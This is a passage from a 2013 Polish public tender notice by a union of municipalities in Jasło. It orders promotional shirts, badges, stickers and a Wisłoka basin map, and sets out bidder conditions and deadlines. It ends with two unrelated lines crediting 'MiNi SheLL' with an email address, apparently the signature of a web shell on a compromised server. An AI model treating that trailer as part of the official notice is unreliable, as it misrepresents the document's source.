Zamawiający określi ilości sztuk koszulek w poszczególnych rozmiarach, po otrzymaniu od Wykonawcy tabeli rozmiarów dla wybranego modelu koszulki. 
-czas przedstawienia projektów do 7dni po podpisaniu Umowy
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
32. Koszulka polo damskie - 130 szt.,  z krótkim rękawem, kolor czerwony i biały (po 65 szt.), krój dopasowany do sylwetki, zapinana na trzy guziki, ściągacze na rękawach, boczne rozcięcia, gramatura 200 g/m2, materiał 100% stabilizowana bawełna czesankowa pique. Nadruk reklamowy wykonany metodą haftu, pow. haftu 6x4 cm (? 1 cm), 4 kolory, wg wytycznych Zamawiającego, + projekty.
Zamawiający określi ilości sztuk koszulek w poszczególnych rozmiarach, po otrzymaniu od Wykonawcy tabeli rozmiarów dla wybranego modelu koszulki. 
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
33. Koszulka polo męskie - 130 szt.,  z krótkim rękawem, kolor czarny i biały (po 65 szt.), zapinana na dwa guziki, ściągacze na rękawach, boczne rozcięcia, gramatura 200-210 g/m2, materiał 100% stabilizowana bawełna czesankowa pique. Nadruk reklamowy wykonany metodą haftu, pow. haftu 6x4 cm (? 1 cm), 4 kolory, wg wytycznych Zamawiającego. 
+ projekty.
Zamawiający określi ilości sztuk bluz w poszczególnych rozmiarach, po otrzymaniu od Wykonawcy tabeli rozmiarów dla wybranego modelu koszulki. 
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
34. Identyfikator konferencyjny - 600 szt., o wymiarach 7,5x11 cm (? 1 cm),
z przezroczystego tworzywa, wizytówki wkładane od góry. Do każdego identyfikatora smycz koloru czerwonego z odpinaną zawieszką telefoniczną, długość z zawieszką 43 cm(? 2 cm), szerokość 6 mm (? 1 mm), wykończona metalowym zaciskiem. Nadruk reklamowy transferowy jednostronny, wg wytycznych Zamawiającego + projekty.
-czas przedstawienia projektów do 7 dni po podpisaniu Umowy,
-czas dostarczenia gotowego produktu do 14 dni po zaakceptowaniu w formie pisemnej projektu przez Zamawiającego.
35. Wykonanie mapy warstwowej zlewni rzeki Wisłoki, w programach graficznych (wektorowym i rastrowym) na nośnikach elektronicznych.
przedmiot zamówienia obejmuje:
1. W grafice wektorowej do obowiązku Wykonawcy należy wykonanie mapy warstwowej z następującą strukturą warstw:
a) mapa Polski z zaznaczonym obszarem zlewni rzeki Wisłoki,
b) mapa zlewni rzeki Wisłoki z jej głównymi dopływami; (Wisłoka jako dopływ Wisły)
c) mapa zlewni rzeki Wisłoki z zaznaczoną granicą obszaru Związku Gmin Dorzecza Wisłoki,
d) 20 map zlewni rzeki Wisłoki - dla każdej Gminy odrębna warstwa,
e) mapa zlewni rzeki Wisłoki z zaznaczonymi granicami administracyjnymi 20 Gmin należących do Związku Gmin Dorzecza Wisłoki wraz z zaznaczeniem miejscowości (siedziby danej Gminy) 
f) mapa zlewni rzeki Wisłoki z zaznaczeniem rozmieszczenia obszarów chronionych występujących na terenie zlewni rzeki Wisłoki
g) mapa zlewni rzeki Wisłoki z  zaznaczeniem rozmieszczenia obszarów specjalnej ochrony przyrody. 
2. W grafice rastrowej do obowiązku Wykonawcy należy również wykonanie następujących map (eksportów):
a) mapa Polski z zaznaczonym obszarem zlewni rzeki Wisłoki,
b) mapa zlewni rzeki Wisłoki z jej głównymi dopływami oraz zaznaczeniem rozmieszczenia obszarów specjalnej ochrony przyrody,
c) mapa zlewni rzeki Wisłoki z zaznaczonymi granicami administracyjnymi 20 Gmin należących do Związku Gmin Dorzecza Wisłoki wraz z zaznaczeniem miejscowości (siedziby danej Gminy), 
d) 2 map zlewni rzeki Wisłoki z wyeksponowaniem wskazanych przez Zamawiającego Gmin. 
36. Naklejka informacyjna - 4500 szt. o wymiarach jednostkowych 10cm x 5cm, 
wykonana na foli odpornej na ścieranie i promieniowanie UV,  nadruk w 4 kolorach. Klej ma  umożliwiać  skuteczne i trwałe przyklejenie do powierzchni metalowych oraz tworzyw sztucznych.
Naklejki informacyjne muszą zawierać następujące elementy:
- logo Swiss Contribution i Bundeslogo - obydwa logotypy powinny obejmować około 25% powierzchni,
- informację o wsparciu w języku polskim
- naklejki informacyjne mogą zawierać inne logotypy; naklejki informacyjne nie mogą jednak zawierać żadnych logotypów wykonawców prywatnych realizujących działania w ramach Projektu.
Szczegółowe wytyczne i wzory tabliczek i naklejek informacyjnych znajdują się w część 2 Księgi identyfikacji wizualnej. Wzory tabliczek i naklejek informacyjnych w formacie PDF można pobrać z witryny internetowej: www.programszwajcarski.gov.pl, zakładka Dokumenty, podzakładka Wytyczne ws. informacji i promocji.
Wykonawca może przystąpić do druku naklejek informacyjnych po uzyskaniu od Zamawiającego pisemnej akceptacji projektu naklejki.
Przewidywany termin realizacji:
- czas przedstawienia projektów do 15.03.2014r.,
- czas dostarczenia gotowego produktu do 30.03.2014r. 


Szczegółowy opis przedmiotu zamówienia zawarty został w załączniku nr 1 do SIWZ.
Ponadto, zamówienie musi obejmować i spełniać warunki: 
1. Projekty graficzne dla poszczególnych działań realizowanych w ramach Umowy muszą być wykonane zgodnie z aktualnymi Wytycznymi dla beneficjentów w zakresie informacji i promocji, dotyczącymi projektów współfinansowanych w ramach Szwajcarsko-Polskiego Programu Współpracy oraz Księgą znaku Swiss Contribution. Pod adresem www.programszwajcarski.gov.pl, zakładka Dokumenty, podzakładka Wytyczne ws. informacji i promocji udostępnione są wszystkie dokumenty i materiały niezbędne do realizacji przedmiotu zamówienia.
2. Każdy projekt, treść oraz miejsce nadruku reklamowego musi być uzgodniony oraz zaakceptowany przez Zamawiającego przed wykonaniem produktu.
3. Dla każdego z wykonywanych materiałów informacyjno-promocyjnych Wykonawca będzie zobowiązany do przedstawienia co najmniej dwóch alternatywnych projektów graficznych.
4. Dostawa materiałów informacyjno-promocyjnych do wskazanego przez Zamawiającego pomieszczenia w Związku Gmin Dorzecza Wisłoki w Jaśle, ul. Towarowa 29, realizowana będzie na koszt Wykonawcy, w terminach uzgodnionych z Zamawiającym..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego opisu powyższego warunku, natomiast warunek zostanie uznany za spełniony w oparciu o oświadczenie Wykonawcy o spełnianiu warunków z art. 22 ust. 1 ustawy Prawo zamówień publicznych (j.t. Dz. U. z 2013r. poz. 907)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składając ofertę winien przedłożyć wykaz, w którym wskaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował jedno zamówienie polegające na opracowaniu i wykonaniu materiałów informacyjno-promocyjnych o wartości min. 20 000,00 PLN brutto i udokumentuje to poprzez podanie ich wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których zostały wykonane oraz załączy dowody potwierdzające, że zostały wykonane lub są wykonywane należycie; 
Dowodami o których mowa powyżej są poświadczenia.
W przypadku zamówień na usługi - oświadczenie wykonawcy- jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
UWAGA!
W postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie rozporządzenia Prezesa Rady Ministrów z dnia 19 luty 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, wykonawca, w miejsce poświadczeń, o których mowa powyżej, może przedkładać dokumenty potwierdzające należyte wykonanie usług, określone w §1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego opisu powyższego warunku, natomiast warunek zostanie uznany za spełniony w oparciu o oświadczenie Wykonawcy o spełnianiu warunków z art. 22 ust. 1 ustawy Prawo zamówień publicznych (j.t. Dz. U. z 2013r. poz. 907)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego opisu powyższego warunku, natomiast warunek zostanie uznany za spełniony w oparciu o oświadczenie Wykonawcy o spełnianiu warunków z art. 22 ust. 1 ustawy Prawo zamówień publicznych (j.t. Dz. U. z 2013r. poz. 907)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę minimum 70 000,00 złotych (ubezpieczenie aktualne na dzień składania ofert)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem pkt 2. 
2. Zamawiający zastrzega sobie możliwość dokonania zmian postanowień Umowy w zakresie:
a) terminu wykonania Przedmiotu Umowy a także terminu opracowania, wykonania oraz dostawy poszczególnych materiałów informacyjno-promocyjnych, w przypadku:
- zaistnienia zdarzeń uniemożliwiających wykonanie umowy w terminach 
o których mowa w § 3 Umowy z przyczyn niezależnych od Wykonawcy lub Zamawiającego, udokumentowanych w sposób nie budzący zastrzeżeń, potwierdzonych protokolarnie,  
- gdy zajdzie konieczność wykonania zamówień dodatkowych nie dających się przewidzieć na etapie sporządzania oferty,
- zmiany końcowego terminu rzeczowej realizacji Projektu: Instalacja systemów energii odnawialnej na budynkach użyteczności publicznej oraz domach prywatnych na terenie gmin należących do Związku Gmin Dorzecza Wisłoki,
b) wynagrodzenia w przypadku ustawowej zmiany stawki podatku od towarów i usług (VAT),
c) wprowadzenia dodatkowego Partnera Projektu do Umowy obok 20 Gmin Partnerskich, w imieniu których Zamawiający na podstawie Umowy partnerskiej i pełnomocnictw podpisał Umowę oraz jego udziału w strukturze wynagrodzenia, o którym mowa w §4 ust. 4 Umowy. Powyższe ma zastosowanie w sytuacji wprowadzenia dodatkowego Partnera do Projektu. Zmiany struktury przeprowadzone będą zgodnie z §4 ust. 5 Umowy.
3. Warunkiem dokonania ww. zmian jest złożenie wniosku przez stronę inicjującą wraz z opisem i uzasadnieniem proponowanej zmiany.
4. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wisloka.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Związek Gmin Dorzecza Wisłoki ul. Konopnickiej 82, 38-200 Jasło (adres pocztowy);
Związek Gmin Dorzecza Wisłoki ul. Towarowa 29, 38-200 Jasło (adres do doręczeń osobistych oraz kurierskich).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2013 godzina 09:00, miejsce: adres pocztowy - ul. M. Konopnickiej 82, 38-200 Jasło; adres do doręczeń osobistych oraz kurierskich - ul. Towarowa 29, 38-200 Jasło, II piętro, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com